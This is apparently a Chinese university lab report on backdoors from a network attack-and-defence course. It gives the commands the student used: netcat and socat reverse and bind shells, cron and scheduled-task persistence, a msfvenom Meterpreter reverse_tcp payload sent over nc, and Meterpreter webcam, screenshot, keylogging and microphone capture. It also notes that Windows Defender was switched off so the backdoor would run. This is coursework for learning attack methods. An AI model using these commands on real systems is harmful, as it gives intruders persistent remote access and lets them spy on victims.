2018-2019-2 20165219《网络对抗技术》Exp2 后门原理与实践
实验内容
使用netcat获取主机操作Shell,cron启动
使用Socat获取主机操作Shell, 任务计划启动
使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
常用后门工具
基础问题
例举你能想到的一个后门进入到你系统中的可能方式?
答:收到虚假邮件,下载邮件的附件
例举你知道的后门如何启动起来(win及linux)的方式?
答:通过修改注册表设置为开机自启动;进入挂马网站
Meterpreter有哪些给你映像深刻的功能?
答:开启摄像头,录制音频等操作。
如何发现自己有系统有没有被安装后门?
答:开启防火墙;下载专业的杀毒软件
实验过程
一 windows下获得一个linux shell
1 在Linux中使用ifconfig查看Linux的ip地址
2 在Windows中使用ipconfig查看本机ip地址
3 windowsncatexe -l -p 5219打开监听,Linuxnc ip 5219 -e /bin/sh反弹连接win,并且在Windows cmd查看是否成功
二 Linux 下获得Windows的cmd程序
1 Linux运行监听指令nc -l -p 5219
2 Windows反弹连接Linuxncat.exe -e cmd.exe ip 5219
3 在Linux shell下使用dir命令
三 在Linux与Windows之间进行数据传送
1 在windows下输入命令:ncat.exe -l 5219,实现监听5219端口
2 Kali下输入ncat ip,连接到windows端口
四使用netcat获取主机操作Shell,cron启动
1 windows端下,输入命令ncat.exe -l -p 5219,监听本机的5219端口
2 kali端下,输入crontab -e,实现编辑一条定时任务。
3 插入* * * * /bin/netcat ip -e /bin/sh
4 保存退出,crontab -l查看
五 使用socat获取主机操作Shell, 任务计划启动
1 win10系统中鼠标右击计算机:计算机管理->系统工具->任务计划程序->创建任务
2 填写任务名称:20165219
3 新建触发器
4 新建操作
5 导入socat.exe的路径,并添加参数:tcp-listen:5219 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5219,同时把cmd.exe的stderr重定向到stdout上)
6 锁定计算机,再次打开,运行任务。
7 在Linux shell中输入socat - tcp:ip:5219
六 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1 kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=5219 -f exe > 20165219_backdoor.exe
2 Windows中使用ncat.exe -lv5219 > 20165219_backdoor.exe
3 Linux中输入nc ip < 20165219_backdoor.exe
在ncat文件夹下查看
4 使用msfconsole进入msf控制台
5 进行一系列的设置
6 运行后门程序
七 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1 webcam_snap可以使用摄像头拍照
2 使用creenshot可以进行截屏
3 keyscan_start 记录下击键的过程
4 record_mic可以截获一段音频
八 遇到的问题
运行后门程序的时候, cMd拒绝访问,双击文件也不可以运行,关掉防火墙也不行 。
解决:把win10 控制面板中的 windows defender安全中心中的病毒威胁和防护功能关掉
九 实验体会
通过这次实验明白了后门的原理。同时也增强了安全防护的意识,实验内容很有趣。